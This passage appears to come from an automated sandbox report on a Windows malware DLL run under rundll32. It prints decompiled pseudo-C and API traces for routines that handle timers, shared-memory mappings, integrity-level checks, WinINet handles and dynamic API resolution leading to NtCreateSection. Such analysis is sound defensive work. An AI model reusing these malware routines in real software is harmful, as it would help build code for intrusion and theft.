                                      						_t138 =  *_t104(3,  &_v72);
                                      						if(_t138 != 0) {
                                      							goto L13;
                                      						}
                                      						goto L12;
                                      					}
                                      					_t138 =  *_t98(1,  &_v72);
                                      					if(_t138 != 0) {
                                      						goto L13;
                                      					}
                                      					goto L9;
                                      				}
                                      				_t116 =  *_t82(0,  &_v72);
                                      				if(_t116 != 0) {
                                      					goto L33;
                                      				}
                                      				goto L6;
                                      			}


                                      APIs
                                      • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 044B7FAE
                                      • LoadLibraryA.KERNEL32(?), ref: 044B802B
                                      • GetLastError.KERNEL32 ref: 044B8037
                                      • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 044B806A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                      • Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd
                                      Similarity
                                      • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                      • String ID: $
                                      • API String ID: 948315288-3993045852
                                      • Opcode ID: 3d9f6fc49f10e44f2a1abce510bbb0d7cac057f4649acbea212f74a85aca9722
                                      • Instruction ID: 8b7e9185f884232443badb5f77a9e658ff1a71b7f3ff1cf5a3ff36c481179dbf
                                      • Opcode Fuzzy Hash: 3d9f6fc49f10e44f2a1abce510bbb0d7cac057f4649acbea212f74a85aca9722
                                      • Instruction Fuzzy Hash: 8C811B75A00605AFDF21DFA8D884AEEB7F9FB48351F15802AE945E7340E774E905CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 139 44b661d-44b664f memset CreateWaitableTimerA 140 44b67d0-44b67d6 GetLastError 139->140 141 44b6655-44b66ae _allmul SetWaitableTimer WaitForMultipleObjects 139->141 142 44b67da-44b67e4 140->142 143 44b6738-44b673e 141->143 144 44b66b4-44b66b7 141->144 145 44b673f-44b6743 143->145 146 44b66b9 call 44b216c 144->146 147 44b66c2 144->147 149 44b6753-44b6757 145->149 150 44b6745-44b674d HeapFree 145->150 154 44b66be-44b66c0 146->154 148 44b66cc 147->148 153 44b66d0-44b66d5 148->153 149->145 152 44b6759-44b6763 CloseHandle 149->152 150->149 152->142 155 44b66e8-44b6715 call 44b43eb 153->155 156 44b66d7-44b66de 153->156 154->147 154->148 160 44b6717-44b6722 155->160 161 44b6765-44b676a 155->161 156->155 157 44b66e0 156->157 157->155 160->153 164 44b6724-44b6734 call 44b70d8 160->164 162 44b6789-44b6791 161->162 163 44b676c-44b6772 161->163 166 44b6797-44b67c5 _allmul SetWaitableTimer WaitForMultipleObjects 162->166 163->143 165 44b6774-44b6787 call 44b561e 163->165 164->143 165->166 166->153 169 44b67cb 166->169 169->143
                                      C-Code - Quality: 83%
                                      			E044B661D(void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                      				void _v48;
                                      				long _v52;
                                      				struct %anon52 _v60;
                                      				char _v72;
                                      				long _v76;
                                      				void* _v80;
                                      				union _LARGE_INTEGER _v84;
                                      				struct %anon52 _v92;
                                      				void* _v96;
                                      				void* _v100;
                                      				union _LARGE_INTEGER _v104;
                                      				long _v108;
                                      				struct %anon52 _v124;
                                      				long _v128;
                                      				struct %anon52 _t46;
                                      				void* _t51;
                                      				long _t53;
                                      				void* _t54;
                                      				struct %anon52 _t61;
                                      				long _t65;
                                      				struct %anon52 _t66;
                                      				void* _t69;
                                      				void* _t73;
                                      				signed int _t74;
                                      				void* _t76;
                                      				void* _t78;
                                      				void** _t82;
                                      				signed int _t86;
                                      				void* _t89;
                                      
                                      				_t76 = __edx;
                                      				_v52 = 0;
                                      				memset( &_v48, 0, 0x2c);
                                      				_t89 = (_t86 & 0xfffffff8) - 0x54 + 0xc;
                                      				_t46 = CreateWaitableTimerA(0, 1, 0);
                                      				_v60 = _t46;
                                      				if(_t46 == 0) {
                                      					_v92.HighPart = GetLastError();
                                      				} else {
                                      					_push(0xffffffff);
                                      					_push(0xff676980);
                                      					_push(0);
                                      					_push( *0x44ba2e0);
                                      					_v76 = 0;
                                      					_v80 = 0;
                                      					L044B824A();
                                      					_v84.LowPart = _t46;
                                      					_v80 = _t76;
                                      					SetWaitableTimer(_v76,  &_v84, 0, 0, 0, 0);
                                      					_t51 =  *0x44ba30c; // 0x2cc
                                      					_v76 = _t51;
                                      					_t53 = WaitForMultipleObjects(2,  &_v80, 0, 0xffffffff);
                                      					_v108 = _t53;
                                      					if(_t53 == 0) {
                                      						if(_a8 != 0) {
                                      							L4:
                                      							 *0x44ba2ec = 5;
                                      						} else {
                                      							_t69 = E044B216C(_t76); // executed
                                      							if(_t69 != 0) {
                                      								goto L4;
                                      							}
                                      						}
                                      						_v104.LowPart = 0;
                                      						L6:
                                      						L6:
                                      						if(_v104.LowPart == 1 && ( *0x44ba300 & 0x00000001) == 0) {
                                      							_v104.LowPart = 2;
                                      						}
                                      						_t74 = _v104.LowPart;
                                      						_t58 = _t74 << 4;
                                      						_t78 = _t89 + (_t74 << 4) + 0x38;
                                      						_t75 = _t74 + 1;
                                      						_v92.LowPart = _t74 + 1;
                                      						_t61 = E044B43EB( &_v96, _t75, _t89 + _t58 + 0x38, _t78,  &_v100); // executed
                                      						_v124 = _t61;
                                      						if(_t61 != 0) {
                                      							goto L17;
                                      						}
                                      						_t66 = _v92;
                                      						_v104.LowPart = _t66;
                                      						if(_t66 != 3) {
                                      							goto L6;
                                      						} else {
                                      							_v124.HighPart = E044B70D8(_t75,  &_v72, _a4, _a8);
                                      						}
                                      						goto L12;
                                      						L17:
                                      						__eflags = _t61 - 0x10d2;
                                      						if(_t61 != 0x10d2) {
                                      							_push(0xffffffff);
                                      							_push(0xff676980);
                                      							_push(0);
                                      							_push( *0x44ba2e4);
                                      							goto L21;
                                      						} else {
                                      							__eflags =  *0x44ba2e8; // 0x0
                                      							if(__eflags == 0) {
                                      								goto L12;
                                      							} else {
                                      								_t61 = E044B561E();
                                      								_push(0xffffffff);
                                      								_push(0xdc3cba00);
                                      								_push(0);
                                      								_push( *0x44ba2e8);
                                      								L21:
                                      								L044B824A();
                                      								_v104.LowPart = _t61;
                                      								_v100 = _t78;
                                      								SetWaitableTimer(_v96,  &_v104, 0, 0, 0, 0); // executed
                                      								_t65 = WaitForMultipleObjects(2,  &_v100, 0, 0xffffffff);
                                      								_v128 = _t65;
                                      								__eflags = _t65;
                                      								if(_t65 == 0) {
                                      									goto L6;
                                      								} else {
                                      									goto L12;
                                      								}
                                      							}
                                      						}
                                      						L25:
                                      					}
                                      					L12:
                                      					_t82 =  &_v72;
                                      					_t73 = 3;
                                      					do {
                                      						_t54 =  *_t82;
                                      						if(_t54 != 0) {
                                      							HeapFree( *0x44ba2d8, 0, _t54);
                                      						}
                                      						_t82 =  &(_t82[4]);
                                      						_t73 = _t73 - 1;
                                      					} while (_t73 != 0);
                                      					CloseHandle(_v80);
                                      				}
                                      				return _v92.HighPart;
                                      				goto L25;
                                      			}


                                      APIs
                                      • memset.NTDLL ref: 044B6637
                                      • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 044B6643
                                      • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 044B666B
                                      • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 044B668B
                                      • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?,?,?,?,044B3EE8,?), ref: 044B66A6
                                      • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,044B3EE8,?,00000000), ref: 044B674D
                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,044B3EE8,?,00000000,?,?), ref: 044B675D
                                      • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 044B6797
                                      • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,?), ref: 044B67B1
                                      • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 044B67BD
                                        • Part of subcall function 044B216C: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,04E69400,00000000,?,76DDF710,00000000,76DDF730), ref: 044B21BB
                                        • Part of subcall function 044B216C: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,04E69438,?,00000000,30314549,00000014,004F0053,04E693F4), ref: 044B2258
                                        • Part of subcall function 044B216C: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,044B66BE), ref: 044B226A
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,044B3EE8,?,00000000,?,?), ref: 044B67D0
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                      • Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd
                                      Similarity
                                      • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                      • String ID:
                                      • API String ID: 3521023985-0
                                      • Opcode ID: 59a125b2db2e17e6037fb826a95d08f4421e0861a35f41a0a2040cc2e4079e37
                                      • Instruction ID: 641045282e4fe5c5f32e716a65be01015c90c232b3a4af2704a50092f7914004
                                      • Opcode Fuzzy Hash: 59a125b2db2e17e6037fb826a95d08f4421e0861a35f41a0a2040cc2e4079e37
                                      • Instruction Fuzzy Hash: B9516FB1509320BFEB10AF15DC44DAFBBE8EB85324F104A1EF99592250D774A944CFE2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      C-Code - Quality: 74%
                                      			E044B76BB(intOrPtr __edx, void** _a4, void** _a8) {
                                      				intOrPtr _v8;
                                      				struct _FILETIME* _v12;
                                      				short _v56;
                                      				struct _FILETIME* _t12;
                                      				intOrPtr _t13;
                                      				void* _t17;
                                      				void* _t21;
                                      				intOrPtr _t27;
                                      				long _t28;
                                      				void* _t30;
                                      
                                      				_t27 = __edx;
                                      				_t12 =  &_v12;
                                      				GetSystemTimeAsFileTime(_t12);
                                      				_push(0x192);
                                      				_push(0x54d38000);
                                      				_push(_v8);
                                      				_push(_v12);
                                      				L044B8244();
                                      				_push(_t12);
                                      				_v12 = _t12;
                                      				_t13 =  *0x44ba348; // 0x9ad5a8
                                      				_t5 = _t13 + 0x44bb87a; // 0x4e68e22
                                      				_t6 = _t13 + 0x44bb594; // 0x530025
                                      				_push(0x16);
                                      				_push( &_v56);
                                      				_v8 = _t27;
                                      				L044B7EAA();
                                      				_t17 = CreateFileMappingW(0xffffffff, 0x44ba34c, 4, 0, 0x1000,  &_v56); // executed
                                      				_t30 = _t17;
                                      				if(_t30 == 0) {
                                      					_t28 = GetLastError();
                                      				} else {
                                      					if(GetLastError() == 0xb7) {
                                      						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
                                      						if(_t21 == 0) {
                                      							_t28 = GetLastError();
                                      							if(_t28 != 0) {
                                      								goto L6;
                                      							}
                                      						} else {
                                      							 *_a4 = _t30;
                                      							 *_a8 = _t21;
                                      							_t28 = 0;
                                      						}
                                      					} else {
                                      						_t28 = 2;
                                      						L6:
                                      						CloseHandle(_t30);
                                      					}
                                      				}
                                      				return _t28;
                                      			}














                                      APIs
                                      • GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,044B3DBA,?,?,4D283A53,?,?), ref: 044B76C7
                                      • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 044B76DD
                                      • _snwprintf.NTDLL ref: 044B7702
                                      • CreateFileMappingW.KERNELBASE(000000FF,044BA34C,00000004,00000000,00001000,?,?,?,?,?,00000000), ref: 044B771E
                                      • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,044B3DBA,?,?,4D283A53,?), ref: 044B7730
                                      • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000,?,?,?,?,00000000), ref: 044B7747
                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,?,044B3DBA,?,?,4D283A53), ref: 044B7768
                                      • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,044B3DBA,?,?,4D283A53,?), ref: 044B7770
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                      • Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd
                                      Similarity
                                      • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                      • String ID:
                                      • API String ID: 1814172918-0
                                      • Opcode ID: 3ca5adf165c10b88ae03927bd2bb74703dfba31d5dcde3ca4051b30402437a62
                                      • Instruction ID: 34fd8290c1f5aeccc0471559182858a8f1274ebd97763f142a56c4f00b2850eb
                                      • Opcode Fuzzy Hash: 3ca5adf165c10b88ae03927bd2bb74703dfba31d5dcde3ca4051b30402437a62
                                      • Instruction Fuzzy Hash: 7D21A5B2640604BBEB21AB68DC45FDE77B9EB84750F240026FA45E7280DB70F905CBE0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      C-Code - Quality: 93%
                                      			E044B4274(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi) {
                                      				void* _t17;
                                      				void* _t18;
                                      				void* _t19;
                                      				void* _t20;
                                      				void* _t21;
                                      				intOrPtr _t24;
                                      				void* _t37;
                                      				void* _t41;
                                      				intOrPtr* _t45;
                                      
                                      				_t41 = __edi;
                                      				_t37 = __ebx;
                                      				_t45 = __eax;
                                      				_t16 =  *((intOrPtr*)(__eax + 0x20));
                                      				if( *((intOrPtr*)(__eax + 0x20)) != 0) {
                                      					E044B6E40(_t16, __ecx, 0xea60);
                                      				}
                                      				_t17 =  *(_t45 + 0x18);
                                      				_push(_t37);
                                      				_push(_t41);
                                      				if(_t17 != 0) {
                                      					InternetSetStatusCallback(_t17, 0);
                                      					InternetCloseHandle( *(_t45 + 0x18)); // executed
                                      				}
                                      				_t18 =  *(_t45 + 0x14);
                                      				if(_t18 != 0) {
                                      					InternetSetStatusCallback(_t18, 0);
                                      					InternetCloseHandle( *(_t45 + 0x14));
                                      				}
                                      				_t19 =  *(_t45 + 0x10);
                                      				if(_t19 != 0) {
                                      					InternetSetStatusCallback(_t19, 0);
                                      					InternetCloseHandle( *(_t45 + 0x10));
                                      				}
                                      				_t20 =  *(_t45 + 0x1c);
                                      				if(_t20 != 0) {
                                      					FindCloseChangeNotification(_t20); // executed
                                      				}
                                      				_t21 =  *(_t45 + 0x20);
                                      				if(_t21 != 0) {
                                      					CloseHandle(_t21);
                                      				}
                                      				_t22 =  *((intOrPtr*)(_t45 + 8));
                                      				if( *((intOrPtr*)(_t45 + 8)) != 0) {
                                      					E044B6C2C(_t22);
                                      					 *((intOrPtr*)(_t45 + 8)) = 0;
                                      					 *((intOrPtr*)(_t45 + 0x30)) = 0;
                                      				}
                                      				_t23 =  *((intOrPtr*)(_t45 + 0xc));
                                      				if( *((intOrPtr*)(_t45 + 0xc)) != 0) {
                                      					E044B6C2C(_t23);
                                      				}
                                      				_t24 =  *_t45;
                                      				if(_t24 != 0) {
                                      					_t24 = E044B6C2C(_t24);
                                      				}
                                      				_t46 =  *((intOrPtr*)(_t45 + 4));
                                      				if( *((intOrPtr*)(_t45 + 4)) != 0) {
                                      					return E044B6C2C(_t46);
                                      				}
                                      				return _t24;
                                      			}













                                      APIs
                                      • InternetSetStatusCallback.WININET(?,00000000), ref: 044B42A2
                                      • InternetCloseHandle.WININET(?), ref: 044B42A7
                                      • InternetSetStatusCallback.WININET(?,00000000), ref: 044B42B2
                                      • InternetCloseHandle.WININET(?), ref: 044B42B7
                                      • InternetSetStatusCallback.WININET(?,00000000), ref: 044B42C2
                                      • InternetCloseHandle.WININET(?), ref: 044B42C7
                                      • FindCloseChangeNotification.KERNEL32(?,00000000,00000102,?,?,044B3801,?,?,76DC81D0,00000000,00000000), ref: 044B42D7
                                      • CloseHandle.KERNEL32(?,00000000,00000102,?,?,044B3801,?,?,76DC81D0,00000000,00000000), ref: 044B42E1
                                        • Part of subcall function 044B6E40: WaitForMultipleObjects.KERNEL32(00000002,044B7BB5,00000000,044B7BB5,?,?,?,044B7BB5,0000EA60), ref: 044B6E5B
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                      • Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd
                                      Similarity
                                      • API ID: Internet$Close$Handle$CallbackStatus$ChangeFindMultipleNotificationObjectsWait
                                      • String ID:
                                      • API String ID: 2172891992-0
                                      • Opcode ID: cdb044a9b2be59397c9398cdc0d089dc43311182a9d1c0841564d6ba1019abb4
                                      • Instruction ID: 3e4439e54ba23aff799eea0aed3f7abf0d0ee50c370d780a8c705525acd48da2
                                      • Opcode Fuzzy Hash: cdb044a9b2be59397c9398cdc0d089dc43311182a9d1c0841564d6ba1019abb4
                                      • Instruction Fuzzy Hash: 1F11F97A6006485BD930AFAAEC8489BF7EDEB442543560D1EE485E3612CB25F8449AB0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      C-Code - Quality: 100%
                                      			E044B6C41(long* _a4) {
                                      				long _v8;
                                      				void* _v12;
                                      				void _v16;
                                      				long _v20;
                                      				int _t33;
                                      				void* _t46;
                                      
                                      				_v16 = 1;
                                      				_v20 = 0x2000;
                                      				if( *0x44ba2fc > 5) {
                                      					_v16 = 0;
                                      					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
                                      						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
                                      						_v8 = 0;
                                      						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
                                      						if(_v8 != 0) {
                                      							_t46 = E044B6D63(_v8);
                                      							if(_t46 != 0) {
                                      								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
                                      								if(_t33 != 0) {
                                      									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
                                      								}
                                      								E044B6C2C(_t46);
                                      							}
                                      						}
                                      						CloseHandle(_v12);
                                      					}
                                      				}
                                      				 *_a4 = _v20;
                                      				return _v16;
                                      			}










                                      APIs
                                      • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 044B6C73
                                      • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 044B6C93
                                      • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 044B6CA3
                                      • CloseHandle.KERNEL32(00000000), ref: 044B6CF3
                                        • Part of subcall function 044B6D63: RtlAllocateHeap.NTDLL(00000000,00000000,044B5D7B), ref: 044B6D6F
                                      • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 044B6CC6
                                      • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 044B6CCE
                                      • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 044B6CDE
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                      • Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd
                                      Similarity
                                      • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                      • String ID:
                                      • API String ID: 1295030180-0
                                      • Opcode ID: 9c1c6b022d8348d5b2ef7a72cb2e50c7e55c73f871e7c3b07cf4f52d821b11bd
                                      • Instruction ID: 5299103f82fe4c12aa7850886e65856f4be68d91995a4ad28b816c09008999cc
                                      • Opcode Fuzzy Hash: 9c1c6b022d8348d5b2ef7a72cb2e50c7e55c73f871e7c3b07cf4f52d821b11bd
                                      • Instruction Fuzzy Hash: 98213D75900209FFEF119F94DD84EEEBB79FB08304F0000A6E951A6251D7759E44DFA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      C-Code - Quality: 64%
                                      			E044B1D33(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                      				intOrPtr _v8;
                                      				intOrPtr _t9;
                                      				intOrPtr _t13;
                                      				char* _t19;
                                      				char* _t28;
                                      				void* _t33;
                                      				void* _t34;
                                      				char* _t36;
                                      				void* _t38;
                                      				intOrPtr* _t39;
                                      				char* _t40;
                                      				char* _t42;
                                      				char* _t43;
                                      
                                      				_t34 = __edx;
                                      				_push(__ecx);
                                      				_t9 =  *0x44ba348; // 0x9ad5a8
                                      				_t1 = _t9 + 0x44bb624; // 0x253d7325
                                      				_t36 = 0;
                                      				_t28 = E044B624E(__ecx, _t1);
                                      				if(_t28 != 0) {
                                      					_t39 = __imp__;
                                      					_t13 =  *_t39(_t28, _t38);
                                      					_v8 = _t13;
                                      					_t6 =  *_t39(_a4) + 1; // 0x4e695b1
                                      					_t40 = E044B6D63(_v8 + _t6);
                                      					if(_t40 != 0) {
                                      						strcpy(_t40, _t28);
                                      						_pop(_t33);
                                      						__imp__(_t40, _a4);
                                      						_t19 = E044B24B3(_t33, _t34, _t40, _a8); // executed
                                      						_t36 = _t19;
                                      						E044B6C2C(_t40);
                                      						_t42 = E044B5A07(StrTrimA(_t36, "="), _t36);
                                      						if(_t42 != 0) {
                                      							E044B6C2C(_t36);
                                      							_t36 = _t42;
                                      						}
                                      						_t43 = E044B4162(_t36, _t33);
                                      						if(_t43 != 0) {
                                      							E044B6C2C(_t36);
                                      							_t36 = _t43;
                                      						}
                                      					}
                                      					E044B6C2C(_t28);
                                      				}
                                      				return _t36;
                                      			}

















                                      APIs
                                        • Part of subcall function 044B624E: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,044B1D4C,253D7325,00000000,00000000,?,7477C740,044B58D7), ref: 044B62B5
                                        • Part of subcall function 044B624E: sprintf.NTDLL ref: 044B62D6
                                      • lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,7477C740,044B58D7,00000000,04E695B0), ref: 044B1D5E
                                      • lstrlen.KERNEL32(00000000,?,7477C740,044B58D7,00000000,04E695B0), ref: 044B1D66
                                        • Part of subcall function 044B6D63: RtlAllocateHeap.NTDLL(00000000,00000000,044B5D7B), ref: 044B6D6F
                                      • strcpy.NTDLL ref: 044B1D7D
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 044B1D88
                                        • Part of subcall function 044B24B3: lstrlen.KERNEL32(00000000,00000000,044B58D7,00000000,?,044B1D97,00000000,044B58D7,?,7477C740,044B58D7,00000000,04E695B0), ref: 044B24C4
                                        • Part of subcall function 044B6C2C: RtlFreeHeap.NTDLL(00000000,00000000,044B5E1D,00000000,?,?,00000000), ref: 044B6C38
                                      • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,044B58D7,?,7477C740,044B58D7,00000000,04E695B0), ref: 044B1DA5
                                        • Part of subcall function 044B5A07: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,044B1DB1,00000000,?,7477C740,044B58D7,00000000,04E695B0), ref: 044B5A11
                                        • Part of subcall function 044B5A07: _snprintf.NTDLL ref: 044B5A6F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                      • Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd
                                      Similarity
                                      • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                      • String ID: =
                                      • API String ID: 2864389247-1428090586
                                      • Opcode ID: 6cc9420b1cf64a8b8284f4a5504b16115e4dde674093bf6e4fbbf0e59d766160
                                      • Instruction ID: 927c8cd243dfcf356b58465d8990b975dc47d2078b7ee21349082fa2d0cfb999
                                      • Opcode Fuzzy Hash: 6cc9420b1cf64a8b8284f4a5504b16115e4dde674093bf6e4fbbf0e59d766160
                                      • Instruction Fuzzy Hash: 2011C633901524776F1277BA9C84CEF7AADDE89658706001BFA80A7202CE78FD0197F2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00401446(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                      				intOrPtr _v8;
                                      				_Unknown_base(*)()* _t29;
                                      				_Unknown_base(*)()* _t33;
                                      				_Unknown_base(*)()* _t36;
                                      				_Unknown_base(*)()* _t39;
                                      				_Unknown_base(*)()* _t42;
                                      				intOrPtr _t46;
                                      				struct HINSTANCE__* _t50;
                                      				intOrPtr _t56;
                                      
                                      				_t56 = E004010A8(0x20);
                                      				if(_t56 == 0) {
                                      					_v8 = 8;
                                      				} else {
                                      					_t50 = GetModuleHandleA( *0x4041c4 + 0x405014);
                                      					_v8 = 0x7f;
                                      					_t29 = GetProcAddress(_t50,  *0x4041c4 + 0x405151);
                                      					 *(_t56 + 0xc) = _t29;
                                      					if(_t29 == 0) {
                                      						L8:
                                      						E0040152A(_t56);
                                      					} else {
                                      						_t33 = GetProcAddress(_t50,  *0x4041c4 + 0x405161);
                                      						 *(_t56 + 0x10) = _t33;
                                      						if(_t33 == 0) {
                                      							goto L8;
                                      						} else {
                                      							_t36 = GetProcAddress(_t50,  *0x4041c4 + 0x405174);
                                      							 *(_t56 + 0x14) = _t36;
                                      							if(_t36 == 0) {
                                      								goto L8;
                                      							} else {
                                      								_t39 = GetProcAddress(_t50,  *0x4041c4 + 0x405189);
                                      								 *(_t56 + 0x18) = _t39;
                                      								if(_t39 == 0) {
                                      									goto L8;
                                      								} else {
                                      									_t42 = GetProcAddress(_t50,  *0x4041c4 + 0x40519f);
                                      									 *(_t56 + 0x1c) = _t42;
                                      									if(_t42 == 0) {
                                      										goto L8;
                                      									} else {
                                      										 *((intOrPtr*)(_t56 + 8)) = _a8;
                                      										 *((intOrPtr*)(_t56 + 4)) = _a4;
                                      										_t46 = E00401000(_t56, _a12); // executed
                                      										_v8 = _t46;
                                      										if(_t46 != 0) {
                                      											goto L8;
                                      										} else {
                                      											 *_a16 = _t56;
                                      										}
                                      									}
                                      								}
                                      							}
                                      						}
                                      					}
                                      				}
                                      				return _v8;
                                      			}

                                      APIs
                                        • Part of subcall function 004010A8: HeapAlloc.KERNEL32(00000000,?,0040132F,00000030,76D863F0,00000000), ref: 004010B4
                                      • GetModuleHandleA.KERNEL32(?,00000020), ref: 0040146A
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 0040148C
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 004014A2
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 004014B8
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 004014CE
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 004014E4
                                        • Part of subcall function 00401000: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000), ref: 0040105D
